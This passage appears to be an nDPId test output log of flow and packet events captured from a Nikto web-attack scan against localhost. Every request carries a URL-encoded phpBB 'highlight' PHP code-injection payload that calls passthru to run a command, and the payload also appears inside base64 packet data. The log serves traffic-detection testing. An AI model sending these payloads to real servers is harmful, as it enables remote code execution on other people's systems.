-01221{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":667,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277772,"flow_last_seen":1576420277772,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277772,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50896,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":668,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277773,"flow_last_seen":1576420277773,"flow_idle_time":7440000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420277773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50898,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00880{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":668,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":668,"flow_packet_id":1,"flow_last_seen":1576420277773,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":364,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":364,"pkt_l4_len":330,"thread_ts_msec":1576420277773,"pkt":"AAAAAAAAAAAAAAAACABFAAFe9U5AAEAGRkl\/AAABfwAAAcbSH5CRq8xwNBHz4IAYAED\/UgAAAQEICp1m\/zWdZv81R0VUIC9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":668,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277773,"flow_last_seen":1576420277773,"flow_idle_time":7440000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420277773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50898,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":669,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277776,"flow_last_seen":1576420277776,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50900,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":669,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":669,"flow_packet_id":1,"flow_last_seen":1576420277776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277776,"pkt":"AAAAAAAAAAAAAAAACABFAAFnAwdAAEAGOIh\/AAABfwAAAcbUH5DtkDois29dAoAYAED\/WwAAAQEICp1m\/zidZv83R0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01225{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":669,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277776,"flow_last_seen":1576420277776,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50900,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":670,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277777,"flow_last_seen":1576420277777,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50902,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":670,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":670,"flow_packet_id":1,"flow_last_seen":1576420277777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277777,"pkt":"AAAAAAAAAAAAAAAACABFAAFsiexAAEAGsZ1\/AAABfwAAAcbWH5BYorDPfm\/b94AYAED\/YAAAAQEICp1m\/zmdZv85R0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9OaWt0bz1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01231{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":670,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277777,"flow_last_seen":1576420277777,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50902,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":671,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277778,"flow_last_seen":1576420277778,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277778,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50904,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":671,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":671,"flow_packet_id":1,"flow_last_seen":1576420277778,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277778,"pkt":"AAAAAAAAAAAAAAAACABFAAFmIsJAAEAGGM5\/AAABfwAAAcbYH5ANfxvlV0uU+oAYAED\/WgAAAQEICp1m\/zqdZv86R0VUIC9tb2R1bGVzL2luZGV4LnBocD9OaWt0bz1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":671,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277778,"flow_last_seen":1576420277778,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277778,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50904,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":672,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277780,"flow_last_seen":1576420277780,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50906,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":672,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":672,"flow_packet_id":1,"flow_last_seen":1576420277780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277780,"pkt":"AAAAAAAAAAAAAAAACABFAAFkWxFAAEAG4IB\/AAABfwAAAcbaH5C23mIrVyENVIAYAED\/WAAAAQEICp1m\/zudZv87R0VUIC9waHBCQi9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQoNCg=="} -01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":672,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277780,"flow_last_seen":1576420277780,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50906,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":673,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277781,"flow_last_seen":1576420277781,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50908,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":673,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":673,"flow_packet_id":1,"flow_last_seen":1576420277781,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277781,"pkt":"AAAAAAAAAAAAAAAACABFAAFkNVNAAEAGBj9\/AAABfwAAAcbcH5ACfAx1v1NrvIAYAED\/WAAAAQEICp1m\/z2dZv89R0VUIC9mb3J1bS9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
-01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":673,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277781,"flow_last_seen":1576420277781,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50908,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":674,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277782,"flow_last_seen":1576420277782,"flow_idle_time":7440000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420277782,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50910,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00847{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":674,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":674,"flow_packet_id":1,"flow_last_seen":1576420277782,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":1576420277782,"pkt":"AAAAAAAAAAAAAAAACABFAAFGytRAAEAGcNt\/AAABfwAAAcbeH5B57PP4Y5pS64AYAED\/OgAAAQEICp1m\/z6dZv8+R0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkyKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01191{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":674,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277782,"flow_last_seen":1576420277782,"flow_idle_time":7440000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420277782,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50910,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":675,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277784,"flow_last_seen":1576420277784,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50912,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00860{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":675,"flow_packet_id":1,"flow_last_seen":1576420277784,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":349,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":349,"pkt_l4_len":315,"thread_ts_msec":1576420277784,"pkt":"AAAAAAAAAAAAAAAACABFAAFPyZ9AAEAGcgd\/AAABfwAAAcbgH5CxOPC81O+RlYAYAED\/QwAAAQEICp1m\/0CdZv8\/R0VUIC9wb3N0bnVrZS92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01201{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":675,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277784,"flow_last_seen":1576420277784,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50912,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":676,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277785,"flow_last_seen":1576420277785,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":1576420277785,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50914,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00865{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":676,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":676,"flow_packet_id":1,"flow_last_seen":1576420277785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":354,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":354,"pkt_l4_len":320,"thread_ts_msec":1576420277785,"pkt":"AAAAAAAAAAAAAAAACABFAAFUq9tAAEAGj8Z\/AAABfwAAAcbiH5CAV5MAtOr6\/IAYAED\/SAAAAQEICp1m\/0GdZv9BR0VUIC9wb3N0bnVrZS9odG1sL3ZpZXd0b3BpYy5waHA\/dD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTIpDQpIb3N0